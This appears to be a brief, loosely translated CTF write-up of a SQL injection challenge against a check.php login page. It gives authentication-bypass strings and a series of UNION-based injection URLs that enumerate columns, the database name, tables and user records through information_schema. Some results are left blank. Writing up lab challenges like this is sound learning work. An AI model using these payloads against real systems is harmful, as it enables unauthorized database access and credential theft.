topic
Open the page and it will show as follows
Check the source code and find a check.php or get parameter.
Try entering account password
The title is sql, use universal password
1'or 1=1#
或
admin' or '1'='1'
I was given a garbled code, but it’s not a flag.
View number of fields
/check.php?username=admin' order by 3%23&password=1
An error is reported at 4, indicating that the number of fields is 3
Use union to query test injection points and view echo points
Construct payload
/check.php?username=1' union select 1,2,3%23&password=1
Display echo points are 2 and 3
View database
/check.php?username=1' union select 1,database(),version()%23&password=1
The available database name is geek
View datasheet
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
Get two data tables
View the fields in the table
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'%23&password=1
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
The fields are all the same
View data in the table
/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
The data in the geekuser table is
The data in the l0ve1ysq1 table is
Incomplete view, see source code
Summarize
Use union to query test injection points and view echo points
Reference article link: